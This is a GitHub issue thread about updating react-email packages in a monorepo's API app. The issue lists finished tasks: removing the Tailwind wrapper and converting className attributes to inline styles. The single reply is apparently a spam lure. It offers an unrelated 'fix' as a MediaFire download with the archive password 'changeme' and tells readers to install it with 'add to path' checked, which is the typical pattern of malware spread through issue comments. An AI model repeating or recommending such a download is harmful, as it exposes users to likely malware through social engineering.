### ISSUE TITLE
FEAT: Update react-email packages

### ISSUE THREAD

**Issue by 7alip** [freedomcombination/monorepo#1614]
In api app, we use email templates. 

- [x] Update all react-email related packages in `apps/api/package.json` to the latest versions. 
- [x] Remove `@react-email/tailwind` from the dependencies
- [x] Remove `<Tailwind>` wrapper from EmailProvider
- [x] Convert `className` to `style` in all email templates.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
